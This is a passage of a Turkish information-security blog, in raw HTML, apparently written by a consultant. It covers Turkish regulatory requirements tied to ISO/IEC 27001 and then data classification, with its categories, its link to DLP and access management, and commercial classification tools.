<td style="border-top: none; border: solid #B4C6E7 1.0pt; mso-border-alt: solid #B4C6E7 .5pt; mso-border-themecolor: accent5; mso-border-themecolor: accent5; mso-border-themetint: 102; mso-border-themetint: 102; mso-border-top-alt: solid #B4C6E7 .5pt; mso-border-top-themecolor: accent5; mso-border-top-themetint: 102; padding: 0cm 5.4pt 0cm 5.4pt; width: 127.35pt;" valign="top" width="160"><div class="MsoListParagraphCxSpFirst" style="line-height: normal; margin-bottom: .0001pt; margin: 0cm; mso-add-space: auto; mso-yfti-cnfc: 4;">
Uygulama Güvenliği<o:p></o:p></div>
</td>
<td style="border-bottom: solid #B4C6E7 1.0pt; border-left: none; border-right: solid #B4C6E7 1.0pt; border-top: none; mso-border-alt: solid #B4C6E7 .5pt; mso-border-bottom-themecolor: accent5; mso-border-bottom-themetint: 102; mso-border-left-alt: solid #B4C6E7 .5pt; mso-border-left-themecolor: accent5; mso-border-left-themetint: 102; mso-border-right-themecolor: accent5; mso-border-right-themetint: 102; mso-border-themecolor: accent5; mso-border-themetint: 102; mso-border-top-alt: solid #B4C6E7 .5pt; mso-border-top-themecolor: accent5; mso-border-top-themetint: 102; padding: 0cm 5.4pt 0cm 5.4pt; width: 6.0cm;" valign="top" width="212"><div class="MsoListParagraphCxSpMiddle" style="line-height: normal; margin-bottom: .0001pt; margin: 0cm; mso-add-space: auto;">
Veri Kaybı Önleme Yazılımları<o:p></o:p></div>
</td>
<td style="border-bottom: solid #B4C6E7 1.0pt; border-left: none; border-right: solid #B4C6E7 1.0pt; border-top: none; mso-border-alt: solid #B4C6E7 .5pt; mso-border-bottom-themecolor: accent5; mso-border-bottom-themetint: 102; mso-border-left-alt: solid #B4C6E7 .5pt; mso-border-left-themecolor: accent5; mso-border-left-themetint: 102; mso-border-right-themecolor: accent5; mso-border-right-themetint: 102; mso-border-themecolor: accent5; mso-border-themetint: 102; mso-border-top-alt: solid #B4C6E7 .5pt; mso-border-top-themecolor: accent5; mso-border-top-themetint: 102; padding: 0cm 5.4pt 0cm 5.4pt; width: 155.65pt;" valign="top" width="194"><div class="MsoListParagraphCxSpLast" style="line-height: normal; margin-bottom: .0001pt; margin: 0cm; mso-add-space: auto;">
Anahtar Yönetimi<o:p></o:p></div>
</td>
</tr>
</tbody></table>
<h2>
</h2>
<h2>
Sermaye Piyasası Kurulu<o:p></o:p></h2>
<div class="MsoListParagraphCxSpFirst" style="mso-list: l7 level1 lfo5; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->5 Ocak 2018 tarihinde yayınlanan Bilgi
Sistemleri Yönetim Tebliğinde ele alındığı üzere bilginin gizliliğinin,
bütünlüğünün ve gerektiğinde erişilebilir olmasının sağlanmasına yönelik olarak
bilgi güvenliği politikasının hazırlanması, risk yönetiminin
gerçekleştirilmesi, bilgi varlıklarının envanterinin oluşturulması ve önem
derecesine göre sınıflandırılması gibi hususlar ISO/IEC 27001 standardı ile
ilişkilendirilebilir. Aynı zamanda erişim haklarının her yıl güncel durumla
uyumlulukları açısından değerlendirmeye tabi tutulması, en az yılda bir kez
sızma testi yaptırılması gibi hususlar da göz önünde bulundurulduğunda BGYS’nin
hayata geçirilmesinin çok avantajlı olacağını söyleyebiliriz. Bu tebliğe
uymakla yükümlü olan kurum, kuruluş ve ortaklıklar aşağıda verilmiştir:<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l7 level2 lfo5; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Borsa İstanbul A.Ş.<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l7 level2 lfo5; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Borsalar ve piyasa işleticileri ile
teşkilatlanmış diğer pazar yerleri<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l7 level2 lfo5; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Emeklilik yatırım fonları<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l7 level2 lfo5; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->İstanbul Takas ve Saklama Bankası A.Ş.<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l7 level2 lfo5; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Merkezi Kayıt Kuruluşu A.Ş.<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l7 level2 lfo5; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Portföy saklayıcısı kuruluşlar<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l7 level2 lfo5; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Sermaye Piyasası Lisanslama Sicil ve Eğitim
Kuruluşu A.Ş.<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l7 level2 lfo5; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Sermaye piyasası kurumları<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l7 level2 lfo5; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Halka açık ortaklıklar<o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l7 level2 lfo5; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Türkiye Sermaye Piyasaları Birliği<o:p></o:p></div>
<div class="MsoListParagraphCxSpLast" style="margin-left: 72.0pt; mso-add-space: auto; mso-list: l7 level2 lfo5; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">-<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Türkiye Değerleme Uzmanları Birliği<o:p></o:p></div>
<h2>
</h2>
<h2>
Dijital Dönüşüm Ofisi<o:p></o:p></h2>
<div class="MsoListParagraph" style="mso-list: l6 level1 lfo7; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->6 Temmuz 2019’da yayınlanan Bilgi ve İletişim
Güvenliği Tedbirleri Genelgesinde ağ güvenliği, kayıtların korunması, mobil
cihaz güvenliği, personel güvenliği gibi hususlara değinilmiştir. Genelgede
milli güvenliği tehdit edebilecek veya kamu düzeninin bozulmasına yol
açabilecek kritik türdeki verilerin güvenliğinin sağlanması amacıyla ulusal ve
uluslararası standartlar ve bilgi güvenliği kriterleri çerçevesinde “Bilgi ve
İletişim Güvenliği Rehberi” oluşturulacağı açıklanmıştır. Tüm kamu kurum ve
kuruluşları ile kritik altyapı hizmeti veren işletmelerde yeni kurulacak bilgi
sistemlerinde, rehberde yer verilen usul ve esaslara uyulması zorunlu
tutulmuştur. <o:p></o:p></div>
<h2>
</h2>
<h2>
Türkiye Cumhuriyeti Merkez Bankası<o:p></o:p></h2>
<div class="MsoListParagraph" style="mso-list: l6 level1 lfo7; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->9 Ocak 2016’da yayınlanan Ödeme ve Menkul Kıymet
Mutabakat Sistemlerinde Kullanılan Bilgi Sistemleri Hakkında Tebliğde bilgi
güvenliği yönetim sistemi oluşturulması, risk yönetim çerçevesi oluşturulması, değişiklik
yönetimi gibi hususlara değinilmiştir. Ayrıca bilgi varlıklarının
sınıflandırılması, yılda en az bir defa sızma testi gerçekleştirilmesi,
personel farkındalığı gibi maddelere değinildiği de göz önünde bulundurulduğunda
BGYS kurulması ve işletilmesinin uyum açısından oldukça faydalı olacağı söylenebilir.<o:p></o:p></div>
<div class="MsoListParagraph" style="mso-list: l6 level1 lfo7; text-indent: -18.0pt;">
<br /></div>
<div class="MsoNormal">
Özetleyecek olursak, kuruluşlarda bilgi güvenliğine verilen
önem ve yasal olarak getirilen zorunluluklar gün geçtikçe artmaktadır. ISO/IEC
27001 standardı baz alınarak kuruluşta bir bilgi güvenliği yönetim sistemi
kurulduğunda erişim yönetimi, risk yönetimi, iç denetim, düzeltici faaliyetler
gibi uygulamalar sayesinde kuruluşun hassas bilgilerinin yetkisiz kişilerin
eline geçmesi, yetkisiz kişilerin bilgilerin bütünlüğünü bozması önlenmiş olur
ve bilgilere ihtiyaç duyulduğunda erişilmesi sağlanmış olur. ISO/IEC 27001
standardına uyumla birlikte kuruluşların bilgi ifşasını önleyerek itibarının
korunması, birlikte iş yapılan üçüncü taraflara bilgilerinin güvenliği
konusunda güvence sağlanması, kuruluşa rekabet avantajı sağlaması ve yasal
yükümlülüklerin yerine getirilmesi sebebiyle küçükten büyüğe tüm kuruluşların
işletmesinde büyük faydalar sağlayacak bir yönetim sistemidir.<o:p></o:p></div>
Sinem Varolhttp://www.blogger.com/profile/16134353775231308294noreply@blogger.com0tag:blogger.com,1999:blog-2815426134653926766.post-64360802448928114272020-04-24T14:55:00.000+03:002020-04-26T01:58:46.916+03:00VERİ SINIFLANDIRMA UYGULAMA ALANLARI<div style="text-align: right;">
<b>Sinem Varol, Danışman</b></div>
<div class="MsoNormal" style="text-align: justify;">
Veriler, kuruluşların işlevlerini
gerçekleştirmeleri için hayati önem taşır. Çalışanın maaşının ödenmesinden,
ürünün sevkiyatının gerçekleştirilmesine kadar kuruluş tüm faaliyetlerinde
veriye ihtiyaç duyar. Verilerin bir kısmı dosya sunucuda, kurumsal
uygulamalarda veya diğer bilgi sistemlerinde bulunabileceği gibi arşivlerde,
çalışma ofisinde, çalışanların masaüstünde veya dolaplarda da bulunabilir, aynı
zamanda web siteleri aracılığı ile tüm dünyaya açılabilir. Veriler bu kadar
çeşitli platformlarda bulunduğu gibi bu verilerin iletimi için de farklı
kanallar kullanılabilir. İlk akla gelen e-posta ya da kargo olmakla birlikte
web entegrasyonları, File Transfer Protocol (FTP) gibi dosya transfer alanları,
taşınabilir ortamlar (USB, DVD vb.), bulut çözümler ve sözlü olarak veri
iletimi gerçekleşebilir. Söz konusu veri türleri kuruluşun iş ortakları,
tedarikçileri, müşterileri, çalışanları gibi tüm paydaşlara ait olabilir. Veri
türleri ve bulundurulduğu alanların çeşitli olması sebebiyle verinin
güvenliğinin sağlanması konusunda sorumluluk giderek artmaktadır. Kuruluşun
çalışanlarının kimlik bilgisi ya da tedarikçilerin açık adres bilgisinin yetkili
olmayan kişilerin eline geçmesi kuruluş açısından eşit derecede zarara sebep
olmaz.<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
Kuruluş için tüm veriler eşit
derecede önem taşımayabilir. Verilerin yetkili olmayan kişilerin eline geçmesi durumunu
ele alacak olursak kurumun bazı verilerinin yetkili olmayan kişilerin eline
geçmesi kuruluşun itibarı ve geleceği açısından büyük tehlike oluştururken bu
durum tüm veriler için aynı değildir. Basit bir örnek vermek gerekirse müşterilerin
kimlik bilgilerinin yetkili olmayan kişilerin eline geçmesiyle kuruluşun
yayınladığı bir finansal raporun yetkili olmayan kişilerin eline geçmesi
kuruluş için eşit derecede etki yaratmaz. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
Veri sınıflandırma, veriyi
anlamlı şekilde gruplara ayırmaktır. Yüzlerce satır ve sütun arasından
ihtiyacınız olanı aramak yerine birbirine benzeyen verileri bir araya getirip
bir grup oluşturmanız halinde belirli filtrelerle ya da belirlediğiniz gruba
uyguladığınız bir etiket sayesinde kolaylıkla ulaşabilirsiniz. Bu sayede verinin yönetilmesi kuruluş için
daha kolay hale gelmektedir. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
Veri sınıflandırmanın bir diğer sebebi
veri güvenliğinin etkin bir şekilde gerçekleştirilmesidir. Tüm verilerin
yetkili olmayan kişilerin eline geçmesi durumunda kuruluşa vereceği zarar eşit
olmamakla birlikte, tüm verilerin eşit derecede güvenliğin sağlanması mümkün
değildir. Tüm veriler için eşit derecede ve en üst seviyeden güvenlik
tedbirlerinin sağlanması kuruluş için maliyetli olacağı gibi kuruluşun
operasyonlarını gerçekleştirmesini yavaşlatacaktır. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
Veri sınıflandırma yöntemlerinin
uygulanmasının kuruluş için birçok avantajı vardır. Verilerin sınıflandırılması
ortak özelliklerine göre yapıldığı için bu veri sınıfları için belirli kurallar
uygulamak daha kolay hale gelecektir. Hassas veya hassas olmayan bilgilerin
neler olduğunu ayrıştırır ve hangileri için ne seviyede güvenlik tedbirleri
alınmalıdır, uygulanan kontroller yeterli midir sorularına cevap niteliği
taşır. Güvenlik tedbirlerinin sınıflandırılmış veriler aracılığıyla alınması veri
sızıntısını engelleme açısından avantaj sağlar. Çalışanların daha hızlı
kararlar almasına yardımcı olur, bu nedenle operasyon süreçleri daha hızlı
ilerler. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
Veri sınıflandırmasının kuruluşa
birçok faydası olduğu gibi bazı kurumlar, standartlar ve çerçeveler bakımından
zorunluluk haline getirilmiştir. Bu husus hakkında bazı örnekler aşağıda
verilmiştir.<o:p></o:p></div>
<div class="MsoListParagraphCxSpFirst" style="margin-left: 54.0pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;"> </span></span>Bankacılık Düzenleme ve Denetleme Kurumu (BDDK),
15.03.2020 tarihinde Resmi Gazetede yayımlanan Bankaların Bilgi Sistemleri ve
Elektronik Bankacılık Hizmetleri Hakkında Yönetmeliğinde, bilgi sistemleri
risklerinin yönetilmesi amacıyla bilgi varlıklarının sınıflandırılmasını ve bu
sınıflara göre uygun güvenlik önlemlerinin alınmasını şart koşmuştur. <o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 54.0pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;"> </span></span>Sermaye Piyasası Kurulu (SPK), 05.01.2018
tarihinde Resmi Gazetede yayımlanan Bilgi Sistemleri Yönetimi Tebliğinde, bilgi
varlıklarının önem derecesinde sınıflandırılmasını zorunlu kılmıştır. <o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 54.0pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;"> </span></span>6698 sayılı Kişisel Verilerin Korunması
Kanununda kişisel verilerin sınıflandırılması, kişisel verilerin işlenmesi
olarak tanımlanmıştır. Ayrıca, veri
sorumlusunun kişisel verilerin güvenliğini sağlama amacıyla her türlü güvenlik
tedbirini alma sorumluluğu olduğu belirtilmiştir. <o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 54.0pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;"> </span></span>13.07.2014 tarihinde Resmi Gazetede yayımlanan
Elektronik Haberleşme Sektöründe Şebeke ve Bilgi Güvenliği Yönetmeliğinde Bilgi
Güvenliği Yönetim Sistemi (BGYS)’nin kurulması, kapsamı ve yönetilmesi başlığı
altında varlıkların sınıflandırılmasını elektronik haberleşme sektöründe
faaliyet gösteren kuruluşlara şart koşmuştur. <o:p></o:p></div>
<div class="MsoListParagraphCxSpMiddle" style="margin-left: 54.0pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;"> </span></span>ISO/IEC 27001 Bilgi Güvenliği Yönetim Sistemi
standardında Ek A kontrollerinde A.8.2 Bilgi Sınıflandırma olarak geçmektedir.
Bu sebeple, ISO/IEC 27001 Bilgi Güvenliği Yönetimi Sistemi sertifikasına sahip
olma zorunluluğu bulunan tüm kuruluşların bu koşulu yerine getirmeleri
gerekmektedir. Bu kontrol maddesinde bilginin yasal şartlar, değeri, kritikliği
ve yetkisiz ifşa veya değiştirilmeye karşı hassasiyet derecesine göre
sınıflandırılması gerektiği belirtilmiştir. Yani bu kontrolde belirtildiği
üzere, bir kuruluşta bilgi güvenliği yönetim sistemi kurulup işletilmek
istendiğinde kuruluşun bilgi varlıklarının sınıflandırması, etiketlemesi ve kullanımı
için prosedür geliştirip uygulamaları gerekmektedir. Tüm bu faaliyetlerin
gerçekleştirilmesinin amacı bilginin kuruluş için önemi derecesinde korunması
gereken seviyede korunmasını sağlamaktır. <o:p></o:p></div>
<div class="MsoListParagraphCxSpLast" style="margin-left: 54.0pt; mso-add-space: auto; mso-list: l0 level1 lfo1; text-align: justify; text-indent: -18.0pt;">
<!--[if !supportLists]--><span style="font-family: "symbol"; mso-bidi-font-family: Symbol; mso-fareast-font-family: Symbol;">·<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; line-height: normal;">
</span></span><!--[endif]-->Control Objectives for Information and Related
Technology (CobiT) çerçevesinde çalışanların iş aktivitelerini destekleyecek
bilgiyi sağlamak, bilinçli bir şekilde karar alabilmek ve verimliliği arttırmak
için kuruluşun verilerini sınıflandırması gerektiği belirtilmiştir.<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
Verilen örneklerde açıkça
görülmektedir ki, veri sınıflandırma gerekliliği hem kuruluş operasyon süreçleri
açısından, hem maliyet hem de verilerin koruması açısından kuruluşa avantaj
sağlamaktadır.<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<b>Veri Sınıflandırmada Kullanılan Genel Kategoriler<o:p></o:p></b></div>
<div class="MsoNormal" style="text-align: justify;">
Veri sınıflandırırken, hassas ve
hassas olmayan verilere yönelik uygun güvenlik tedbirlerinin alınabilmesi için
veriler belirli kategorilere dâhil edilir. Bu kategoriler belirlenirken kuruluş
kendine uygun olan kategoriler oluşturmalıdır. Bazı kuruluşlar için verileri
gizli kalma hassasiyetleri açısından üç kategoriye ayırmak yeterli olabilir
fakat bazı kuruluşlar dört ya da beş kategoriye ayırmaya ihtiyaç duyabilir.
Örnek vermek gerekirse; “halka açık, kurum içi, gizli” şeklinde üç kategori bir
kuruluşun bilgi varlıklarının gizli kalma hassasiyetleri açısından bilgi
varlıklarını net bir çizgiyle anlaşılabilir bir biçimde ayırıyorsa bu
kategoriler o kuruluş için yeterlidir diyebiliriz. Dört seviyede kategoriye
ayrılmak istendiğinde “genel, dahili, gizli, çok gizli” şeklinde çeşitlendirilebilir,
yeterli olmadığı takdirde beş seviyeli bir sınıflandırma da kullanılabilir.<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
Kuruluşlar çalışan sayısı, ciro,
faaliyet alanı, veri paylaşılan taraflar ve daha birçok yönden birbirinden
farklılık gösterdiği için bu kategoriler yeterli olmayabilir. Kategori sayısı
ihtiyaca oranla az kullanıldığı takdirde veriler için yeterli güvenlik
önlemleri sağlanamayabilir. Örneğin veri sınıflandırırken aslında gizli
kategorisinde olması gereken bir veri, kararsız kalınıp, kurum içi olarak
sınıflandırıldığında o veri için alınacak güvenlik tedbirleri kurum içi veriler
seviyesinde olacağı için bu durumda yeterli güvenlik sağlanmamış olur. Bu
durumda söz konusu veri için yetkisiz kişilerin eline geçme ihtimali artar.<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
Gizli kalma hassasiyeti açısından
sınıflandırılmış veriler için farklı güvenlik tedbirleri uygulanmaktadır. Kuruluş
“genel” ya da “halka açık” olarak sınıflandırdığı veriler için ek bir güvenlik
tedbiri almaya ihtiyaç duymayabilir. Bu veriler kuruluş dışındaki kişilerle de
paylaşılabildiği için görüntülenmesi, paylaşılması ve kullanılması açısından
bir sakınca yoktur. “Dahili” ya da “kurum içi” sınıfındaki veriler genel olarak
kuruluş içinde tüm çalışanlar tarafından görüntülenebilir. Bu sınıftaki veriler
içinse yetkili olmayan kişiler haricinde erişilmemesi ve paylaşılmaması
gerektiği için ek güvenlik tedbirleri alınmalıdır. Örneğin bu sınıftaki veriler
için; e-posta yoluyla paylaşılırken şifreleme kullanılabilir ve eğer
çalışanların kullandığı cihazda bulunuyorsa disk şifrelemeyle veriler
korunabilir. “Gizli” ve “çok gizli” sınıflarındaki veriler genellikle
kuruluştaki tüm çalışanların değil yöneticilerin veya üst yönetimin
erişebildiği veya paylaşabildiği verilerdir. Bu verilerin bulunduğu ortam dosya
sunucu ise erişim için dosyalar şifrelenebilir ya da basılı evrak ise kilitli
dolapta tutulabilir. Ek olarak, bazı kuruluşlar tüm gizli kalma
hassasiyetindeki verilerini korumak adına çalışanların kuruluş dışına e-posta
gönderimini olanak dışı kılmaktadır. Bazı çalışanlara gerekli durumlarda yetki
verilebilir.<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<b>Veri Sınıflandırmasının Desteklediği Diğer Güvenlik Alanları<o:p></o:p></b></div>
<div class="MsoNormal" style="text-align: justify;">
Veri sınıflandırmanın kuruluşa
sağladığı diğer avantajlar da Veri Sızıntısı Önleme (Data Loss Prevention -DLP),
erişim yönetimi gibi verinin güvenliğini sağlamaya yönelik alanlarda
kullanılmasıdır. Kuruluşlar için hassas veriyi takip etmek giderek
zorlaşmıştır. Bu ihtiyaç doğrultusunda zaman içinde verinin güvenliğini
sağlamak adına farklı araçlar geliştirilmiştir.<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
Erişim yönetimi, veri sınıflandırmanın
fayda sağladığı bir güvenlik alanıdır. Erişim yönetiminin uygulanmasında
kullanılan yöntemlerden biri kullanıcı kimliklerinin yönetilmesidir. Tüm kullanıcı kimliklerinin erişebileceği
alanlar belirlendiğinde, hassas verilerin yetkili olmayan kişilerin eline
geçmemesi için iyi bir yol kat edilmiştir denebilir. Kimlik ve erişim yönetimi
alanında en çok kullanılan araçlara Azure Active Directory, IBM Security and
Access Assurance ve Oracle Identity Cloud Service örnek verilebilir. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
Veri Sızıntısı Önleme (Data Loss
Prevention - DLP) teknolojisi, kuruluş içinde hassas olarak nitelendirilen
verileri sanal ortamda takip eder ve verilerin kuruluş dışına sızmasını
engeller. Farklı veri sınıfları için verilerin iletilmesi ve erişilmesi için
farklı kurallar oluşturulur. Verinin geçtiği kanalları ve yetkisiz erişimleri
izler. Kuralları farklı iletişim kanallarında (web, e-posta, cloud)
uygulayabilme gibi özellikleri vardır. Verilerin bulunduğu dosyalar seçilerek
etiketler uygulanır, aynı zamanda belirlenmiş kullanıcıların erişmesi hariç
tutulabilir. Etiketleme işlemi belirli veri türleri ya da sözcükleri içeren
dosyalar olarak otomatik olarak da yapılabilir. Bu alanda en çok kullanılan
uygulamalara Symantec DLP, Checkpoint, Digital Guardian ve Microsoft 365 DLP
aracı örnek verilebilir. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
<br /></div>
<div class="MsoNormal" style="text-align: justify;">
<b>Veri Sınıflandırma İçin Kullanılan Uygulamalar <o:p></o:p></b></div>
<div class="MsoNormal" style="text-align: justify;">
Verilerin sınıflandırılmasını
tamamıyla gerçekleştirmek ve bu süreci tam olarak yönetebilmek bir kuruluş için
oldukça efor gerektiren bir çalışmadır. Çalışanların saatlerini hatta
haftalarını bu süreci tamamlamak için yapacakları çalışmalarla, görüşmelerle
geçirmeleri gerekebilir. Kuruluşların hassas verilerinin güvenliğini sağlama
ihtiyacı arttıkça ve teknoloji geliştikçe bu alanda yeni araçlar geliştirilmiş
ve kullanılmaya başlanmıştır. Bu uygulamaların kullanılması aynı zamanda
kullanıcıları hassas verilerin kullanılması ve iletilmesi konusunda daha
sorumlu hale getirir. Bu makalede herhangi bir ürüne yönlendirme amacı
bulunmamaktadır. Bilgilendirme amacıyla ürünlerin özelliklerinden
bahsedilmiştir.<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
Bu uygulamalardan biri olan TITUS
Classification, kullanıcı cihazlarının (mobil veya değil) eriştiği belgelerdeki
hassas veririn güvenliğinin sağlanması için politikalar belirleyerek bunların
uygulanmasını zorunlu tutar. Mobil cihazlarda, MS Office programlarında, e-postalarda
ve dokümanlarda kullanılabilir. E-postalara görseller yerleştirilerek
kullanıcılar için hassas verilerin iletilmesi konusunda farkındalık sağlanabilir.
Aynı zamanda e-postalardaki eklerin görüntülenmesi de kullanıcı bazlı
kısıtlanabilir. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
Veri sınıflandırma için
kullanılan bir diğer araç olan Boldon James; ağdaki dosyaları, e-postaları,
Sharepointteki dosyaları ve bulutta paylaşılan dosyaları sınıflandırmada
kullanılabilir. Veri sınıflandırma etiketleri, kuruluşun veri güvenliği
politikasına uygun bir şekilde uygulanır. Boldon James aynı zamanda güvenli
mesajlaşma çözümünde sahiptir. Bu sayede hassas verilerin iletimindeki
güvenliği sağlanmış olur.<o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
Symantec Information Centric Tagging
(ICT) uygulaması ile MS Office programlarındaki ve e-postalardaki verilere
kolaylıkla gizlilik etiketi uygulanabilir. Symantec DLP uygulaması ile
bütünleşik bir şekilde çalışır ve hassasiyeti yüksek verilerin sızmasını
engellemeye yardımcı olur. Kuruluşun veri gizliliği politikasına uyum
sağlamasına ve kullanıcı farkındalığını arttırmaya yardımcı olur. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
Office 365 uygulamasıyla birlikte
gelen veri sınıflandırma özelliğinde etiketler tanımlanır ve etiket kuralları
oluşturulur. Bu etiketler Outlook, OneDrive ve Sharepoint gibi uygulamalarda da
kullanılabilir. Örneğin bir etiket için sınırlı bir süre seçilip, bu süre
sonunda bu etikete sahip verinin silinmesi sağlanabilir ya da çok gizli
etiketine sahip bir verinin e-posta yoluyla iletilmesi engellenebilir. <o:p></o:p></div>
<div class="MsoNormal" style="text-align: justify;">
Tüm bu uygulamaların ortak
özelliği KVKK, ISO/IEC 27001, COBIT gibi yasal uyumluluk gerektiren
düzenlemelere ve çerçevelere uyum sağlama konusunda fayda sağlamalarıdır. KVKK’ya
